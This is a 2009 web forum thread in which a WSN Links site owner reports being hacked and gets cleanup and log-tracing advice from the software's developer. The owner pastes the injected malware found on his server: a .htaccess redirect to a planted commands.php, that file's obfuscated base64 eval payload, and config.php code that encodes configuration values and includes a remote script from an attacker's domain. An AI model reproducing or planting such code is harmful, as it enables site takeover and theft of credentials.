Webmastersite.net
Register Log In

I've been hacked

Comments on I've been hacked

finsandfur
Forum Regular

Usergroup: Customer
Joined: Apr 18, 2006

Total Topics: 28
Total Comments: 103
Posted Apr 08, 2009 - 7:38 PM:

My links site has been hacked pretty heavily I feel.

Not to degrade the security of WSN, because I think it was through template files which were chmodded to 777.

I noticed some pretty peculiar activity in my raw access logs, calling for files that did not exist. And a name of "bdbjizzazbzeh" doing most if it.

Couple days later there are duragotive text links added to my wrapper and main tpl's. I managed to get rid of those, but after an in depth look at some of the directorys in Cpanel, these people had a blast in there.

Any directory with an htaccess, the htaccess file within points to a php file they have either created or rewrote. I'm not sure what files are WSN and what isn't anymore.

An example the htaccess file inside the includes directory reads;

Options -MultiViews
ErrorDocument 404 //includes/commands.php



And the referring commands.php reads:

<?php error_reporting(0);$s="e";$p="bdbjizzazbzeh";eval(base64_decode("Y2xhc3Mgb W0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCkpOyB3aGlsZSAoIWVtcHR5K CRkYXRhKSkgeyBpZiAoc3RycG9zKCRkYXRhLCAnTG9jYXRpb246ICcpICE9P SBmYWxzZSkgeyAkbmV3X2xvY2F0aW9uID0gdHJpbShzdHJfcmVwbGFjZSgnT G9jYXRpb246ICcsICcnLCAkZGF0YSkpOyBicmVhazsgfSAkZGF0YSA9IHJ0c mltKGZnZXRzKCR0aGlzLT5jb25uX2lkLCAzMDApKTsgfSB0cmlnZ2VyX2Vyc m9yKCR0aGlzLT5mdWxsdXJsLicgJy4kaGVhZFsyXS4nOiAnLiRuZXdfbG9jY XRpb24sIEVfVVNFUl9OT1RJQ0UpOyAkdGhpcy0+c3RyZWFtX2Nsb3NlKCk7I HJldHVybiAoJGNbJ21heF9yZWRpcmVjdHMnXSA+ICR0aGlzLT5yZWRpcmVjd HMrKyAmJiAkdGhpcy0+c3RyZWFtX29wZW4oJG5ld19sb2NhdGlvbiwgJHRoa XMtPmRlZm1vZGUsICR0aGlzLT5vcHRpb25zLCBudWxsKSAmJiAkdGhpcy0+c 3RyZWFtX2ZsdXNoKCkpOyB9ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtP mNvbm5faWQsIDEwMjQpKTsgd2hpbGUgKCFlbXB0eSgkZGF0YSkpIHsgJGh0d HBfcmVzcG9uc2VfaGVhZGVyIC49ICRkYXRhLiJcclxuIjsgaWYgKHN0cnBvc ygkZGF0YSwnQ29udGVudC1MZW5ndGg6ICcpICE9PSBmYWxzZSkgeyAkdGhpc y0+c3RhdFsnc2l6ZSddID0gdHJpbShzdHJfcmVwbGFjZSgnQ29udGVudC1MZ W5ndGg6ICcsICcnLCAkZGF0YSkpOyB9IGVsc2VpZiAoc3RycG9zKCRkYXRhL CdEYXRlOiAnKSAhPT0gZmFsc2UpIHsgJHRoaXMtPnN0YXRbJ2F0aW1lJ10gP SBzdHJ0b3RpbWUoc3RyX3JlcGxhY2UoJ0RhdGU6ICcsICcnLCAkZGF0YSkpO yB9IGVsc2VpZiAoc3RycG9zKCRkYXRhLCdMYXN0LU1vZGlmaWVkOiAnKSAhP T0gZmFsc2UpIHsgJHRoaXMtPnN0YXRbJ210aW1lJ10gPSBzdHJ0b3RpbWUoc 3RyX3JlcGxhY2UoJ0xhc3QtTW9kaWZpZWQ6ICcsICcnLCAkZGF0YSkpOyB9I CRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDEwMjQpKTsgf SBpZiAoJGhlYWRbMV0gPj0gNDAwKSB7IHRyaWdnZXJfZXJyb3IoJHRoaXMtP mZ1bGx1cmwuJyAnLiRoZWFkWzJdLCBFX1VTRVJfV0FSTklORyk7IHJldHVyb iBmYWxzZTsgfSBpZiAoJGhlYWRbMV0gPT0gMzA0KSB7IHRyaWdnZXJfZXJyb 3IoJHRoaXMtPmZ1bGx1cmwuJyAnLiRoZWFkWzJdLCBFX1VTRVJfTk9USUNFK TsgcmV0dXJuIGZhbHNlOyB9IHJldHVybiB0cnVlOyB9DQpmdW5jdGlvbiBzd HJlYW1fc3RhdCgpIHsgJHRoaXMtPnN0cmVhbV9mbHVzaCgpOyByZXR1cm4gJ HRoaXMtPnN0YXQ7IH0NCmZ1bmN0aW9uIGRpcl9vcGVuZGlyKCRwYXRoLCAkb 3B0aW9ucykgeyByZXR1cm4gZmFsc2U7IH0NCmZ1bmN0aW9uIGRpcl9yZWFkZ GlyKCkgeyByZXR1cm4gJyc7IH0NCmZ1bmN0aW9uIGRpcl9yZXdpbmRkaXIoK SB7IHJldHVybiAnJzsgfQ0KZnVuY3Rpb24gZGlyX2Nsb3NlZGlyKCkgeyByZ ")); ?>



My config.php file has been hit as well, and now has the following at the bottom;

$str=base64_encode($a).".".base64_encode($b).".".base64_enco de($c).".".base64_encode($g).".".base64_encode($h).".".base6 4_encode($n);if((include_once(base64_decode("aHR0cDovLw=="). "bdbjizzazbzeh".base64_decode("LnVzZXJzLnBocG luY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."[highlight =rgb(0, 255, 0);]bdbjizzazbzeh[/highlight]".base64_decode("LnVzZXJzLnBocG luY2x1ZGUucnU=")."/?".$str);}?>



I'm looking for advice at this point. Is it possible for me to download WSN links again and compare the directory structure and maybe delete the files they have created?

If I save the database and kill the rest, reinstall with the 5.0 series, will it fix me up?

Or can I over write with another install of my current version?
AutumnWindz
Member

Usergroup: Customer
Joined: Oct 01, 2004

Total Topics: 14
Total Comments: 46
Posted Apr 08, 2009 - 9:06 PM:

First, and I am sure you have heard this before, always have a clean copy of your site backed up offline so you can simply overwrite the files.

I don't know that they could get to your congif file through your templates, though I could be wrong, this may have been a hack into your server.

You can get a clean copy of the files by going to the customer area and downloading the manual upgrade version to get all of the files - not the new install. If you run a new install it will empty your database - learned that one the hard way a few years back!

Can you tell by looking at the date/time of the file on your server to see which ones were changed?

Paul may have other suggestions, but if it were me I would overwrite all of the files with the new ones from the manual upgrade version if I didn't have a clean copy offline. If they got into your config file, you will need to recreate it somehow as it has your database information in it that is inserted during a new install.
Paul
developer

Usergroup: Administrator
Joined: Dec 20, 2001
Location: Diamond Springs, California

Total Topics: 61
Total Comments: 7868
Paul
Posted Apr 09, 2009 - 8:24 PM:

777 chmods are not, in themselves, vulnerabilities. All they do is allow anyone who has already hacked you to write to those files in apache mode (in suPHP mode, the hacker can already write to all your files).

The only chance at finding out how they got in is the server traffic logs combined with checking the last modification date of the hacked file(s). If config.php was last modified on 4/5/2009 8:15am, for example, the apache log line for what was being accessed on 4/5/2009 at 8:15am will likely reveal how the attack was executed and allow me to prevent it from happening again. Or at least it'll be the start of the trail, sometimes there are several steps to get back to the original hack.

Talking about cleanup at this point is premature since the attack vector is still open, they'll just re-hack. You'll need to remove the injected material from the config.php and any templates, though. You can delete all files and use a new WSN install's files, replacing the config.php info with your current database.
finsandfur
Forum Regular

Usergroup: Customer
Joined: Apr 18, 2006

Total Topics: 28
Total Comments: 103
Posted Apr 09, 2009 - 10:07 PM:

Thanks guys. I had several directorys set at 777 also. I recall leaving them that way do to extensive editing and uploading.

Once I spent even more time looking around, it was actually kind of easy cleaning things up. They actually put the htaccess files in the chmmoded directorys and then set it to call their files in that directory. So following it all was fairly time consuming but not real difficult.

I also had a backup of the config file so removing thier code was possible also.



Checking the server logs didn't do much good because I'm not sure how long it had been hacked. It was hacked, by the looks of things, way before the duragotive text links were added, which is what tipped me off.

After removing all added php files and the htaccess files directing to them, I fixed permissions on the directories and the config file, and everything seems to be back to normal. Also changed admin username and password.



I'll see how it goes, and if nothing else, I'll kill it and reinstall as mention Paul. I was hoping to do so as a last resort, since there has been major template alterations by me.
Paul
developer

Usergroup: Administrator
Joined: Dec 20, 2001
Location: Diamond Springs, California

Total Topics: 61
Total Comments: 7868
Paul
Posted Apr 09, 2009 - 11:00 PM:

Checking the server logs didn't do much good because I'm not sure how long it had been hacked.

That's why you need to look at the file last modification time via FTP. That tells you when it was hacked. If you give me the server log and the last modification time of a hacked file -- and/or the creation time of the .htaccess files they inserted -- odds are I can trace it back.

I fixed permissions

777 permissions doesn't mean something is broken. The script is going to change a bunch of permissions back to 777 when it needs to anyhow.
finsandfur
Forum Regular

Usergroup: Customer
Joined: Apr 18, 2006

Total Topics: 28
Total Comments: 103
Posted Apr 11, 2009 - 12:08 AM:

The first hack according to "last modified date" is 1/23/09. I switched hosts and moved to Liquid Web on 3/23/09. And now I'm showing several more files hacked on 4/4/09

The only apache logs I have are dated 4/8 and another 4/10 which one do you want, and how would you like it?
Paul
developer

Usergroup: Administrator
Joined: Dec 20, 2001
Location: Diamond Springs, California

Total Topics: 61
Total Comments: 7868
Paul
Posted Apr 12, 2009 - 3:26 AM:

If the log doesn't contain the most recent 4/4/09 hack time, then it doesn't help. If you have cpanel, set it to archive the logs in the future so you'll have logs going back far enough next time.
finsandfur
Forum Regular

Usergroup: Customer
Joined: Apr 18, 2006

Total Topics: 28
Total Comments: 103
Posted Apr 20, 2009 - 6:59 PM:

Paul, as you expected, I'm still having trouble.

I'd like to move to the 5.0 series at this point, since I'm going to dump all my current files.

My question is can I use my current config file for the 5.0 series?

I dont care about any current templates, I can rebuild all that. My biggest concern is retaining my 284 links and the 263 members.
Paul
developer

Usergroup: Administrator
Joined: Dec 20, 2001
Location: Diamond Springs, California

Total Topics: 61
Total Comments: 7868
Paul
Posted Apr 21, 2009 - 9:37 PM:

Run the new upgrade.php on the old config + database and it'll be upgraded.

Again though, none of this may help you until you check the last modified time of a hacked file and compare with the logs.
finsandfur
Forum Regular

Usergroup: Customer
Joined: Apr 18, 2006

Total Topics: 28
Total Comments: 103
#10 - Quote - Permalink
Posted Apr 21, 2009 - 9:53 PM:

I know the last modified date of the hacked files, the problem is I dont have the logs to go with it. I've just installed SUexe on my server and closed what I believe could have been a few other security leaks, and I cut off log rotation so there's no gaps in the logs.

All I can really do that I know of at this point is move forward and hopefully be a little more prepared for if it with my changes if happens a again.
Search thread for
Download thread as
  • 0/5
  • 1
  • 2
  • 3
  • 4
  • 5



Sorry, you don't have permission to post posts. Log in, or register if you haven't yet.